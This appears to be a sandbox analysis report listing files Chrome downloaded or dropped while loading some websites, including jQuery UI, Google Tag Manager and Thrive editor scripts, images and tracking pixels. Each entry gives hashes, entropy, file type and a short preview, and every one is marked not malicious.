                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2485)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):26027
                                                                                                                                                                                                                                                        Entropy (8bit):5.3038105115157475
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYsph6FocXpOJRqKYTaMmk:RIT7sZwuvL54WAcl/Q
                                                                                                                                                                                                                                                        MD5:2F29D251681DD2A797E2198B978A162B
                                                                                                                                                                                                                                                        SHA1:4298B8D97FBD52D36C2606CC350E76BFFD1FFF82
                                                                                                                                                                                                                                                        SHA-256:21F059BD41F1976D5A97E03A759CAA58B9AF71B94FB27B6A8A4A4CC4CDAB41A0
                                                                                                                                                                                                                                                        SHA-512:A744D34CA261EEACF342F39916E6BC4C71034EAA3BCD8407ED97B0E5AC91925F091AF669AB38B176E0F539E05F75AD46CC0ED22A36C6F3A03108E978DD6493AA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, resolutionunit=2, manufacturer=Canon, model=Canon EOS R5, xresolution=153, yresolution=161, software=Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh), datetime=2024:12:09 14:53:06, xresolution=242, yresolution=250], baseline, precision 8, 420x280, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):48259
                                                                                                                                                                                                                                                        Entropy (8bit):7.935788194399393
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:n3nYyo5tKDWw+rQi+rPN2WdHqMspVhRKd1xPRsLlgFl0YujV/LWrQ0SoMwV:n3ns5ifPN2WdKTmd1ULeL/uRDmlV
                                                                                                                                                                                                                                                        MD5:ED76ADE5DB83125202BC46B346258FB6
                                                                                                                                                                                                                                                        SHA1:F2E3D95BF5A426A261F55545060714A5D79C1B16
                                                                                                                                                                                                                                                        SHA-256:CF9C1EAF43EBDFDEB5DAC454B08379BF82B437D06331864957101F23EE6BD54B
                                                                                                                                                                                                                                                        SHA-512:DCFCDDAFF57ACB44412D1EF31F8176F6C71693460837B795FB046B68C4C3A12B8D8216296F9225FFE23BFC6C1B99A383EF933C1A99CA6A85C67ED16F6F78FE1F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/86630945-fa46-44bc-bf53-730648f81adc.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,.....hExif..II*.......(...........................................................1...5.......2...................................i...............Canon.Canon EOS R5.,.......,.......Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh).2024:12:09 14:53:06.H.......H....... .0...........2..........."...........'...................0231................................39..........39..................................................................................................1...........2...........4...........5...................................................................(...........0...........8...........@...........H...........P...........X.......-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.........#.......2024:12:09 07:37:26.2024:12:09 07:37:26.H.o.@B..........................@.........}......_S........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ....
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8349)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8536
                                                                                                                                                                                                                                                        Entropy (8bit):5.053313782705997
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:7r2AeY1jWBoYfgZn+gSEmaAGCkHjpXCNd882E9cNS/JWmx:7r2AeSWBoYfon+gSDkrH1XCNd882E9ce
                                                                                                                                                                                                                                                        MD5:6A53E18A345B37D4F72262A071684E79
                                                                                                                                                                                                                                                        SHA1:7269F0F9A41CA95DF23387E1C4DAD415F0228979
                                                                                                                                                                                                                                                        SHA-256:3AB937AE57EF4A48601774B6A0CC701482A5C8BC126FCB677DB4842B3A3C0003
                                                                                                                                                                                                                                                        SHA-512:7F1B7BA5EBAFB6E1CB9791CE8A0AD6EEC1A743E6B15AD3E2D05F38ECF9A7F3437E41F398D3A91FCFBD294073CAE25C4E4F6B5FC96526828071A0FC5EE0327B78
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*!. * jQuery UI Autocomplete 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","./menu","../keycode","../position","../safe-active-element","../version","../widget"],e):e(jQuery)}(function(o){"use strict";return o.widget("ui.autocomplete",{version:"1.13.3",defaultElement:"<input>",options:{appendTo:null,autoFocus:!1,delay:300,minLength:1,position:{my:"left top",at:"left bottom",collision:"none"},source:null,change:null,close:null,focus:null,open:null,response:null,search:null,select:null},requestIndex:0,pending:0,liveRegionTimer:null,_create:function(){var i,s,n,e=this.element[0].nodeName.toLowerCase(),t="textarea"===e,e="input"===e;this.isMultiLine=t||!e&&this._isContentEditable(this.element),this.valueMethod=this.element[t||e?"val":"text"],this.isNewMenu=!0,this._addClass("ui-autocomplete-input"),t
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):329019
                                                                                                                                                                                                                                                        Entropy (8bit):5.5756413419418935
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:jEXy+3IsyjHuBSVQF6STnhsGC5H0uGDhNcvnzHV6:jEzItDuBbRuGDfiT0
                                                                                                                                                                                                                                                        MD5:47375BC4366A3FEBAF33F7A94C198574
                                                                                                                                                                                                                                                        SHA1:0B3D27EA283DEF3DB1B42FA540A4FD9637C9A37D
                                                                                                                                                                                                                                                        SHA-256:B6E5AA050CF93FB6AADF9E5FF9A49319B288688A23D1B66C34AB83B8F8F237FC
                                                                                                                                                                                                                                                        SHA-512:0C563E3B34BF19A59316B115378C70FB89948584DBA9FD12A4E066BD5C184CA2D1D15AB93E6D84C869F0251D4E3AA6255CCD87D4D60EB8807FC11451E863C903
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-RSYQJ6KTLL&gacid=932040568.1736387953&gtm=45je5170v9134491864za200&dma=0&gcd=13l3l3l3l2l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=668126290
                                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1000 x 1000, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):105963
                                                                                                                                                                                                                                                        Entropy (8bit):7.978338939051904
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:+cI9EHdWy2fFW8vj5FQYK+6Oyu8Myg9J2W:+1KWy2fF5FVLb7Z99J5
                                                                                                                                                                                                                                                        MD5:8D0A2C1E8D242051E26CFACBCFDD5AAC
                                                                                                                                                                                                                                                        SHA1:64275BAF11B2236333EABCB8CA77FCDAF10E2435
                                                                                                                                                                                                                                                        SHA-256:BE6FFBBD43380FD2BB5F1F1A38AC40941747751581762FD39C09FF0AB9AE631E
                                                                                                                                                                                                                                                        SHA-512:2A592BDD086D54C0A6A25E9B1C07F3748A5CF5406A79A13A0F90572C5B4186A8CCEF2EEC1FAF69F12AA1CC8CDED5A7E4293FA899E27E8EC192228473E52DF182
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............M.......pHYs.................IDATx...u|S.....M.........m..m..1.1w.`...17.L:a....a.[...m...H.w>.&'.y>.y..o...{.....t"..B.!..B..L...!...B.X... ..c...D.z...@8......i...g....;..m.v5P.....3V...*.:......@.?.\y....@..[.7..!....i2....B.Qc....Jj|...8.W|.......r....E{...{..8..*....})..B.?..].!D..,. .h.d..@:..<.H.Rp...........@~.....`/p.i.W.P.!.. )..B...bM.Uxg."<....6..'...W........x...u.r..B.!t$...B...8...h....9...n.xj...v`..^;.]2./...WH.....h...W...W.....M................p.r....!... ...B.%4.5.h...o.....B.0...u......._.?nt.r..._.!.p;)..B..f.......B.}..`T.M....p_...U....:m..*..!..oR..!..f.F..._..N...0....K...}...X..u.r.T..B..?.@.B.q\4.5...t..6~l.tI....l.V.+.?.r.rKT..B..@.B..4.5.W1...4~l.h*s...../.l..W9m..JS.!..zR..!....bm...z.=q-S.R.J..f....`)..i..6..B.o#...B..........^.JC.....%.....2.e.B..&...B...b...........+.%....$.g`>..i.P.I.!.'I....~...[?.W.w.L*3.!...W......|N.!....B..g4.5.W!..#.Y]....u....<`..[.4..B.]I....>N.X.....F.:.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2, orientation=upper-left], baseline, precision 8, 480x640, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):72344
                                                                                                                                                                                                                                                        Entropy (8bit):7.9753071080533635
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:MCi/vKs+734Gz05FJE+9hyDb0g/o2MgBNMH9bYPvUa/lqrw:Zi+3SbLyDlyAo9bcvUOw8
                                                                                                                                                                                                                                                        MD5:125530A417048C654CEBD5C696904926
                                                                                                                                                                                                                                                        SHA1:89FF845E54EE13E0850218396C306367FD127D79
                                                                                                                                                                                                                                                        SHA-256:5D73B5F34BA3C626549061B326F979673ED2EAAFF98B2C2AD084835EF821A35B
                                                                                                                                                                                                                                                        SHA-512:3D78B4A340D604BD06A0C050B17FB6CBC6C66960ACE56622E494B6333EF47EEE582C6A26274A472A23B44722114D4B23208BFB56C70D791F624A3769F622FD57
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.............ZExif..MM.*...................i.........&..................................................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..........................................................................................?...h..U...~E...R..J...:....9....EU.s..Uhq]...:UV.zf..0./J....w.JH9.*,.QZ...d...du.....$.W.Nj....U."..d.....f4|.vCZl...%M...L).^h.j..+...qQ..cm0.t...6R...jN3J.E.z.u.c...@G$..w.m[sV|.5n..H.(.Po-k.... ...v.}..W..n.JgR.)r...BzU...M.".F.....XW......a.P.6.2...j=..]..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4909
                                                                                                                                                                                                                                                        Entropy (8bit):4.9560854515639745
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:QqxnA9oqtdTnTrCtOuHkae21oY/kbVQ/VmXVWxllBpBBpWbh8cM3bY+DYEYFsI:QqZWN/TnTCeyoY/kxWmlCxh8Wcp+cEKJ
                                                                                                                                                                                                                                                        MD5:5903AF029674C076453CC048C5545BED
                                                                                                                                                                                                                                                        SHA1:C3D48ED621531AFA5011B8E2A5754E45E7B1E9E2
                                                                                                                                                                                                                                                        SHA-256:B2CFA8C07E56391BC35B0A0243A343FC8B8B63A54BEB98C3831F9C84CDCB67C5
                                                                                                                                                                                                                                                        SHA-512:767B8ECA54052D08B1CB5248F0D24D471B21CB9A17B0F9E184B1BFBFD593B5614423DA472859DFA94E20EC82A02116FFA4D81E6650F74D508AFCD3B65519A9BD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules.dropdown&&TCB_Front.setModuleLoadedStatus("dropdown",!1),(t=>{if(TCB_Front.isModuleLoaded("dropdown"))return;const e=".tve_lg_dropdown, .tcb-form-dropdown, .tve-dynamic-dropdown";t(window).on("tcb_after_dom_ready",(()=>{if(!TCB_Front.Utils.isEditorPage()){const e=t(TCB_Front.Utils.isEditorPage()?"#tve_editor":"body");TCB_Front.Utils.initDropdown(e)}})),TCB_Front.Utils.initDropdown=o=>{t(".tve_lg_dropdown .tve-lg-dropdown-trigger, .tcb-form-dropdown .tve-lg-dropdown-trigger, .tve-dynamic-dropdown .tve-lg-dropdown-trigger").each((function(){t(this).attr("tabindex",-1).removeAttr("href").siblings("input").attr("style","position: absolute; opacity: 0;").attr("autocomplete","off")}));let n="";const d=function(){n="",t(".tve-lg-dropdown-search").length&&t(".tve-lg-dropdown-search").val(""),t(".tve-lg-dropdown-option.tve-state-hover,.tve-dynamic-dropdown-option.tve-state-hover").removeClass("tve-state-hover")},r=function(t,e){e.find(".tve-lg-dropdown-trigger").fi
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):28690
                                                                                                                                                                                                                                                        Entropy (8bit):7.969230938264276
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:VNYg4mMrSSNd3C05Q2ZH+J0m9lp8TBixXUx4N:VN4tc2Z0Tm+EeN
                                                                                                                                                                                                                                                        MD5:B21592328AC0DA1822ABA3DFE7EBACBA
                                                                                                                                                                                                                                                        SHA1:B6A5C4B7C9399BE13924BA23C59919B6A5BF962B
                                                                                                                                                                                                                                                        SHA-256:24E8FD3D6CA9D02C1C0337E7A62FB7B00D6D57E828CD627B98902D8F9A050FDE
                                                                                                                                                                                                                                                        SHA-512:3E1CC656E422B17EBA8C5653C349718866DFEEC4A611D1D4F63EB16CA9B6ADAC99C0F60EB1C71DE235298FBA21C9D7897D80202D73476861939F3EE2C561835C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Vl..kNNs..8...A../Zs.i...^.<.}+...+N#.R..=j.}+>.._......SV.Ldl*......(..0....0.T&.T..XsQ..Q..@....P.T.}...1O..W.LDPr........qQA.....L....Z.....>.@....T....Q.`%M.D.L...f*..V*..B,GW"5Q*.t.....Z.......S..RS...@.4.RQE.....B..5..........5...@..6S...L..........4.#..9..M."..(e..%.+..-.O..fb..$.z~.f.Qq....U.....;....9....3.+Z...J. ..J.......X3E7......U...h...p.-d#&N..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15448), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15448
                                                                                                                                                                                                                                                        Entropy (8bit):5.117831950273977
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:8I3Zvzlj9UZWJJzFMnWoOSQuiuOclRJvl6Md3aDj8AhF/XjzJ8ZZwIRrWAcSr7La:8I3Zvzlj9UWJJzFMFQuiuOclRJvl6Y3o
                                                                                                                                                                                                                                                        MD5:3AAFF408519478A9CB4705C07228E358
                                                                                                                                                                                                                                                        SHA1:D56FCD6923789BC3375A373F598511B6760697DE
                                                                                                                                                                                                                                                        SHA-256:BA4A6484D2753269A4A3B2CE8017D03D2AE957E4305E3B176F46F5632D2E8116
                                                                                                                                                                                                                                                        SHA-512:8FCF288BD650A754CBC9A96B83B50C1B53A97CBDEFB2CE9220FBFB0DF219E726939980D32B923B3EA3E5CE62C53AFC3793C21697855BE7AA902C9C51F3D9D1E3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{var e={74208:e=>{void 0===TCB_Front.js_modules.menu&&TCB_Front.setModuleLoadedStatus("menu",!1),function(t,n){if(TCB_Front.isModuleLoaded("menu"))return;const o=e=>["auto","scroll","hidden"].includes(e.css("overflow"));let i;function s(e){return t(e).closest(".thrv_widget_menu")}const a={init(){tve_frontend_options.is_editor_page||a.frontendInit(),a.customMenuSwitchIcon(),i||(i=a.customMenuSwitchIcon.bind(this,!1),n.addResizeCallback(i)),a.zIndexOrder(),t(".thrv_widget_menu").each(((e,t)=>{a.addMutationListener(t)})),a.handleHiddenItems()},handleHiddenItems(){t(".thrv_widget_menu ul").each(((e,n)=>{const o=t(n),i=o.closest("li").find("> a .tve-item-dropdown-trigger"),s=this.hasVisibleItems(o);s||n.style.setProperty("display","none","important"),i.toggle(s)}))},hasVisibleItems(e){let t=!1;return e.find("> li").each(((e,n)=>{getComputedStyle(n).getPropertyValue("display").includes("none")||(t=!0)})),t},zIndexOrder(){const e=t("ul.tve_w_menu");n.highestZIndex=e.length+6;let o=n.high
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-VFFY2PDZ27&gacid=932040568.1736387953&gtm=45je5170v9118100243z8898710595za200zb898710595&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=1445872596
                                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                        MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                        SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                        SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                        SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 900 x 629, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):734033
                                                                                                                                                                                                                                                        Entropy (8bit):7.994706339921343
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:12288:Ch4FTZNPnSDJnkBuE35ZyuBFQYD139yrjBCl+Z/V2VBgQtd7vm20HAOPn6d7SSWb:CsNPnruE35ZyuBFf4sEZd2VKv20gOw7i
                                                                                                                                                                                                                                                        MD5:CAA8E1FA3E868402B75BBD54903338C2
                                                                                                                                                                                                                                                        SHA1:EB4090A72AF4E71B1F2912A7A38E5829107E9E5A
                                                                                                                                                                                                                                                        SHA-256:E3AF465B372A79CFE013A2AF8CA3351F36186D3AC4492218809627AE4DCED51E
                                                                                                                                                                                                                                                        SHA-512:64F8C745FBF4E9A1012A837C7EEBC5E10B2EA4521D1487DA8765DF2C973FDF8FA7174B7AE4513296913025FFE966E585752A68EE34701F5DC8FAF851C683BEB6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......u.......>3....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):66989
                                                                                                                                                                                                                                                        Entropy (8bit):7.9760589202963885
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:w8S4vYQgNpDiCpUWXkaCpUV9TLh1vlaU/NjWhHngsuLjs7bRvt:BBvpqU2kaC2LhjaAAngNat
                                                                                                                                                                                                                                                        MD5:C5AF9181D32057971283EB2E129E1320
                                                                                                                                                                                                                                                        SHA1:D29B957B2230BD95289D6CD2CA4BA5C6011EC7AB
